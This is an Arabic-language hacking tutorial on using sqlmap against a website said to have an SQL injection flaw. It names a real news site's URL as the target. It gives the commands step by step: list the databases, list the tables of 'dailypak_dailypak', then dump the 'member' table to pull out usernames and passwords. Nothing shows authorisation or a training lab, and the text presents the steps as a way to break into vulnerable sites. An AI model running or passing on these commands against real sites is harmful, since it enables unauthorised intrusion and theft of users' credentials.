.jpeg)
لنفترض هاذ الموقع مصاب بثغره SQL
http://www.e-paper.dailypakistan.pk/newsdetail.php?id=9
نفتح التيرمنال في لينكس ونكتب
sqlmap -u http://www.e-paper.dailypakistan.pk/newsdetail.php?id=9 --dbs
هاذ الامر راح يسحبلك الداتا الموجوده داخل الموقع او قواعد البيانات
تبحث عن كلمت user او username
واذا مش لاقيها راح تكتب الامر التالي عشان يستخرجلك التيبلز الموجوده داخل هاذي الداتا يعني لنفرض وجدت انت مجلدات اثنين او اكثر تبدي فيهم بترتيب عشان تلاقيهم
يعني احنا راح نلاقي ملفين في هاذ الموقع
dailypak_dailypak
information_schema
هيك اساميهم هي راح تختلف من موق الى اخر
راح نبدي ب اول ملف نكتب الامر التالي لكي نشوف شو داخله
sqlmap -u http://www.e-paper.dailypakistan.pk/newsdetail.php?id=9 -D dailypak_dailypak --tables
هيك راح يستخرج النه عده ملفات ثانيه بندور على كلمت username او اي شي يدل على انها تحفظ هيك معلومات
هوه راح يستخرج هاذي الملفات
member
advert
article
author
latestnews
وفي بعد ملفات
على اتفاقنه نبدي بالترتيب تمام
راح نكتب هاذ الامر عشان يستعرض شو داخلهن
sqlmap -u http://www.e-paper.dailypakistan.pk/newsdetail.php?id=9 -D dailypak_dailypak -T member --dump
هيك احنا استخرجنا معلومات هاذ الملف
راح نلاقي في داخله خانات ثانيه من ضمنهن
member_usre
member_password
هذول المطلوبات الي كنا نبحثن عنهن
راح تلاقي اليوزر تحت member_user والباسورد تحت member_password
الاسامي تتغير في كل مواقع يعني مو شرط نفس الشيئ تمام
لى هنا وينتهي الشرح اتمنا تكونو فهمتو الشرح وطريقه استخدام اداه sqlmap وكيفيه اختراق المواقع المصابه بثغره SQL